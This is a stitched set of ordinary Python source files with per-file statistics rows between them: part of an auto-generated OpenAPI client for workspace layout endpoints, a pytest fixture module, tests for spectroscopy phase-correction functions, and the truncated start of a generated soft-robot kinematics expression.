params_map={
'all': [
'workspace_id',
'declarative_workspace_model',
],
'required': [
'workspace_id',
'declarative_workspace_model',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
'declarative_workspace_model':
(DeclarativeWorkspaceModel,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
'declarative_workspace_model': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_workspace_layout
)
def __set_analytics_model(
self,
workspace_id,
declarative_analytics,
**kwargs
):
"""Set analytics model # noqa: E501
Set effective analytics model of the workspace. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_analytics_model(workspace_id, declarative_analytics, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
declarative_analytics (DeclarativeAnalytics):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
kwargs['declarative_analytics'] = \
declarative_analytics
return self.call_with_http_info(**kwargs)
self.set_analytics_model = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/analyticsModel',
'operation_id': 'set_analytics_model',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'workspace_id',
'declarative_analytics',
],
'required': [
'workspace_id',
'declarative_analytics',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
'declarative_analytics':
(DeclarativeAnalytics,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
'declarative_analytics': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_analytics_model
)
def __set_logical_model(
self,
workspace_id,
declarative_model,
**kwargs
):
"""Set logical model # noqa: E501
Set effective logical model of the workspace. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_logical_model(workspace_id, declarative_model, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
declarative_model (DeclarativeModel):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
kwargs['declarative_model'] = \
declarative_model
return self.call_with_http_info(**kwargs)
self.set_logical_model = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/logicalModel',
'operation_id': 'set_logical_model',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'workspace_id',
'declarative_model',
],
'required': [
'workspace_id',
'declarative_model',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
'declarative_model':
(DeclarativeModel,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
'declarative_model': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_logical_model
)
def __set_organization_layout(
self,
declarative_organization,
**kwargs
):
"""Set organization layout # noqa: E501
Sets complete layout of organization, like workspaces, user-groups, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_organization_layout(declarative_organization, async_req=True)
>>> result = thread.get()
Args:
declarative_organization (DeclarativeOrganization):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_organization'] = \
declarative_organization
return self.call_with_http_info(**kwargs)
self.set_organization_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/organization',
'operation_id': 'set_organization_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_organization',
],
'required': [
'declarative_organization',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_organization':
(DeclarativeOrganization,),
},
'attribute_map': {
},
'location_map': {
'declarative_organization': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_organization_layout
)
def __set_workspace_data_filters_layout(
self,
declarative_workspace_data_filters,
**kwargs
):
"""Set all workspace data filters # noqa: E501
Sets workspace data filters in all workspaces in entire organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_workspace_data_filters_layout(declarative_workspace_data_filters, async_req=True)
>>> result = thread.get()
Args:
declarative_workspace_data_filters (DeclarativeWorkspaceDataFilters):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_workspace_data_filters'] = \
declarative_workspace_data_filters
return self.call_with_http_info(**kwargs)
self.set_workspace_data_filters_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaceDataFilters',
'operation_id': 'set_workspace_data_filters_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_workspace_data_filters',
],
'required': [
'declarative_workspace_data_filters',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_workspace_data_filters':
(DeclarativeWorkspaceDataFilters,),
},
'attribute_map': {
},
'location_map': {
'declarative_workspace_data_filters': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_workspace_data_filters_layout
)
def __set_workspaces_layout(
self,
declarative_workspaces,
**kwargs
):
"""Set all workspaces layout # noqa: E501
Sets complete layout of workspaces, their hierarchy, models. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_workspaces_layout(declarative_workspaces, async_req=True)
>>> result = thread.get()
Args:
declarative_workspaces (DeclarativeWorkspaces):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_workspaces'] = \
declarative_workspaces
return self.call_with_http_info(**kwargs)
self.set_workspaces_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces',
'operation_id': 'set_workspaces_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_workspaces',
],
'required': [
'declarative_workspaces',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_workspaces':
(DeclarativeWorkspaces,),
},
'attribute_map': {
},
'location_map': {
'declarative_workspaces': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_workspaces_layout
)
| 37.584158
| 124
| 0.479303
| 7,446
| 87,308
| 5.342197
| 0.030218
| 0.033938
| 0.026145
| 0.027151
| 0.895294
| 0.862638
| 0.842023
| 0.830233
| 0.81085
| 0.799236
| 0
| 0.003249
| 0.443052
| 87,308
| 2,322
| 125
| 37.600345
| 0.81479
| 0.344218
| 0
| 0.638705
| 1
| 0
| 0.228367
| 0.064469
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013871
| false
| 0
| 0.009247
| 0
| 0.036988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b6b8e9fcffb5d1c25fe87536af1a30787e90d54
| 177
|
py
|
Python
|
tests/message_processing/conftest.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
tests/message_processing/conftest.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
tests/message_processing/conftest.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
import pytest
from .load_fixtures import load_fixture_messages
@pytest.fixture
def fixture_messages():
    """Load the canned pending-tx message fixtures for these tests."""
    fixture_file = "test-data-pending-tx-messages.json"
    return load_fixture_messages(fixture_file)
| 19.666667
| 70
| 0.813559
| 24
| 177
| 5.75
| 0.583333
| 0.326087
| 0.275362
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 177
| 8
| 71
| 22.125
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0.19209
| 0.19209
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
59f4c94b24c76c626e35f7304097ac83e1ab4752
| 2,194
|
py
|
Python
|
tests/test_mrs/test_processing/test_phasing.py
|
hjiang1/suspect
|
f8b320b16bbd73a95d58eea1660921d6cad16f36
|
[
"MIT"
] | 16
|
2016-08-31T21:05:06.000Z
|
2022-02-06T12:48:33.000Z
|
tests/test_mrs/test_processing/test_phasing.py
|
hjiang1/suspect
|
f8b320b16bbd73a95d58eea1660921d6cad16f36
|
[
"MIT"
] | 141
|
2016-07-28T21:34:17.000Z
|
2022-03-30T09:00:36.000Z
|
tests/test_mrs/test_processing/test_phasing.py
|
hjiang1/suspect
|
f8b320b16bbd73a95d58eea1660921d6cad16f36
|
[
"MIT"
] | 21
|
2016-08-04T14:54:19.000Z
|
2022-03-29T16:04:08.000Z
|
import suspect
import numpy as np
def test_mag_real_zero():
    """mag_real should recover the negated zeroth-order phase within rtol.

    Fix: seed the noise generator. The original used unseeded
    np.random.rand, making this tolerance-based test non-deterministic
    (could fail intermittently on an unlucky noise draw).
    """
    rng = np.random.default_rng(0)
    time_axis = np.arange(0, 1.024, 2.5e-4)
    sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 12)
                   + suspect.basis.gaussian(time_axis, 250, 0.0, 12)
                   + suspect.basis.gaussian(time_axis, 700, 0.0, 12))
    sample_data = sample_data.adjust_phase(0.2, 0)
    # small reproducible noise floor
    sample_data += rng.random(len(sample_data)) * 1e-6
    phi0, phi1 = suspect.processing.phase.mag_real(sample_data)
    np.testing.assert_allclose(phi0, -0.2, rtol=0.4)
def test_acme_zero():
    """acme should recover the negated zeroth-order phase within rtol.

    Fix: seed the noise generator. The original used unseeded
    np.random.rand, making this tolerance-based test non-deterministic.
    """
    rng = np.random.default_rng(0)
    time_axis = np.arange(0, 1.024, 2.5e-4)
    sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 12)
                   + suspect.basis.gaussian(time_axis, 50, 0.0, 12)
                   + suspect.basis.gaussian(time_axis, 200, 0.0, 12))
    sample_data = sample_data.adjust_phase(0.2, 0)
    # small reproducible noise floor
    sample_data += rng.random(len(sample_data)) * 1e-6
    phi0, phi1 = suspect.processing.phase.acme(sample_data)
    np.testing.assert_allclose(phi0, -0.2, rtol=0.05)
def test_acme_first():
    """acme should recover both zeroth- and first-order phase terms.

    Fix: seed the noise generator. The original used unseeded
    np.random.rand, making this tolerance-based test non-deterministic.
    """
    rng = np.random.default_rng(0)
    time_axis = np.arange(0, 1.024, 2.5e-4)
    sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 6)
                   + suspect.basis.gaussian(time_axis, 150, 0.0, 6))
    # reproducible noise floor
    sample_data += rng.random(len(sample_data)) * 2e-6
    in_0 = 0.5
    in_1 = 0.001
    sample_data = sample_data.adjust_phase(in_0, in_1)
    out_0, out_1 = suspect.processing.phase.acme(sample_data)
    # acme returns the correction, i.e. the negation of the applied phase
    np.testing.assert_allclose(in_0, -out_0, rtol=0.5)
    np.testing.assert_allclose(in_1, -out_1, rtol=0.5)
def test_acme_range_hz():
    """acme restricted to a frequency range should still recover the phase.

    Fix: seed the noise generator. The original used unseeded
    np.random.rand, making this tolerance-based test non-deterministic.
    """
    rng = np.random.default_rng(0)
    time_axis = np.arange(0, 1.024, 2.5e-4)
    sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 12)
                   + suspect.basis.gaussian(time_axis, 50, 0.0, 12)
                   - suspect.basis.gaussian(time_axis, 200, 0.0, 12))
    # reproducible noise floor
    sample_data += rng.random(len(sample_data)) * 1e-7
    in_0 = 0.2
    in_1 = 0.001
    sample_data = sample_data.adjust_phase(in_0, in_1)
    # restrict fitting to the range excluding the negative 200 Hz peak
    out_0, out_1 = suspect.processing.phase.acme(sample_data, range_hz=(-1000, 75))
    np.testing.assert_allclose(in_0, -out_0, rtol=0.05)
    np.testing.assert_allclose(in_1, -out_1, rtol=0.2)
| 35.387097
| 83
| 0.646764
| 374
| 2,194
| 3.57754
| 0.149733
| 0.179372
| 0.164425
| 0.197309
| 0.894619
| 0.894619
| 0.872945
| 0.872945
| 0.82287
| 0.802691
| 0
| 0.101841
| 0.20784
| 2,194
| 61
| 84
| 35.967213
| 0.668009
| 0
| 0
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.093023
| false
| 0
| 0.046512
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
941028b720d64cb83ee2031ab1e3cd5946102040
| 60,029
|
py
|
Python
|
o/soft_robot/rmp/Phi_2.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/rmp/Phi_2.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/rmp/Phi_2.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
import numpy
def f(q, xi):
return numpy.array([
[((-4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 
0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 53.3333333333333*q[3, 0] + 26.6666666666667*q[4, 0] + 26.6666666666667*q[5, 0]) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(-51312626661.0909*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**5 + 1623563577.94858*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 31963907.9408627*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 337119.341563786*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1422.22222222222*q[3, 0]**2 + 1422.22222222222*q[3, 
0]*q[4, 0] + 1422.22222222222*q[3, 0]*q[5, 0] - 1422.22222222222*q[4, 0]**2 + 1422.22222222222*q[4, 0]*q[5, 0] - 1422.22222222222*q[5, 0]**2 + 1))*(60131984.3684659*xi**9*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 - 1522090.85432679*xi**7*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 + 22474.6227709191*xi**5*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 - 79.0123456790123*xi**3*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(2*q[6, 0]**2 - 2*q[6, 0]*q[7, 0] - 2*q[6, 0]*q[8, 0] + 2*q[7, 0]**2 - 2*q[7, 0]*q[8, 0] + 2*q[8, 0]**2) + (1/3)*xi*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 
